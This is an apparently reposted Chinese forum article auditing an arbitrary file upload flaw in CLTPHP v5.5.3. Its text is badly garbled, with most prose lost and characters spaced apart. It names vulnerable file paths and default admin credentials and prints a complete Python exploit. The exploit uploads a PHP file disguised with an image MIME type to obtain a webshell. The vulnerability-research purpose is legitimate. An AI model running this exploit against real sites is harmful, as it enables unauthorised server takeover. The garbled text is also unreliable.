[848] 2018-03-18_【代码审计】CLTPHP_v5.5.3任意文件上传漏洞

文档创建者:s7ckTeam
浏览次数:8
最后更新:2025-01-16
2018-03-18_【代码审计】CLTPHP_v5.5.3任意文件上传漏洞 0 0 0 1 0 2 C L T P H P _ v 5 . 5 . 3     B y p a s s   B y p a s s   2 0 1 8 - 0 3 - 1 8 C L T P H P T h i n k P H P L a y u i C N V D C L T P H P h t t p : / / w w w . c l t p h p . c o m C L T P H P 5 . 5 . 3 h t t p s : / / g i t e e . c o m / c h i c h u / c l t p h p   h t t p : / / 1 2 7 . 0 . 0 . 1 / a d m i n / l o g i n / i n d e x . h t m l   a d m i n     a d m i n 1 2 3 1 / a p p / u s e r / c o n t r o l l e r / U p F i l e s . p h p   5 - 2 5 m o v e 2 / t h i n k / l i b r a r y / t h i n k / F i l e . p h p   3 2 9 - 3 7 7 c h e c k
0 3 c h e c k 3 / t h i n k / l i b r a r y / t h i n k / F i l e . p h p   2 1 8 - 2 4 5 c h e c k M i m e $ r u l e c h e c k $ r u l e $ t h i s - > v a l i d a t e , v a l i d a t e $ v a l i d a t e v a l i d a t e T h i n k P H P c h e n k 1   P y t h o n A j a x   P y t h o n 1 .   # ! / u s r / b i n / p y t h o n     2 .   # - * -   c o d i n g :   U T F - 8   - * -     3 .   # A u t h o r B y p a s s     4 .   # D a t e 2 0 1 8 . 0 3 . 0 1     5 .   i m p o r t   r e q u e s t s     6 .   i m p o r t   s y s    
7 .   8 .   d e f   C L P H P _ u p l o a d ( u r l ) :     9 .           h e a d e r   =   {   ' U s e r - A g e n t '   :   ' M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   5 . 5 ;   W i n d o w s   N T ) '   ,     1 0 .                                   ' X - R e q u e s t e d - W i t h ' :   ' X M L H t t p R e q u e s t ' , }       1 1 .           g e t u r l   =   u r l + " / u s e r / u p F i l e s / u p l o a d "     1 2 .           f i l e s   = { ' f i l e ' : ( ' 1 . p h p ' , o p e n ( ' 1 . p h p ' , ' r b ' ) , ' i m a g e / j p e g ' ) }     1 3 .           r e s   =   r e q u e s t s . p o s t ( g e t u r l ,   f i l e s = f i l e s , h e a d e r s = h e a d e r )     1 4 .           p r i n t   r e s . t e x t     1 5 .       1 6 .   i f   _ _ n a m e _ _   = =   " _ _ m a i n _ _ " :     1 7 .           i f   l e n ( s y s . a r g v )   = =   2 :     1 8 .                   u r l = s y s . a r g v [ 1 ]     1 9 .                   C L P H P _ u p l o a d ( u r l )     2 0 .                   s y s . e x i t ( 0 )     2 1 .           e l s e :     2 2 .                   p r i n t   ( " u s a g e :   % s   w w w . x x x . c o m "   %   s y s . a r g v [ 0 ] )     2 3 .                   s y s . e x i t ( - 1 )               2 1 . p h p P y t h o n 3 访 u r l g e t s h e l l d e m o g e t s h e l l 1 u r l P y t h o n 2 w e b s h e l l
0 4 1 2 B y p a s s A b o u t   M e W A F
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则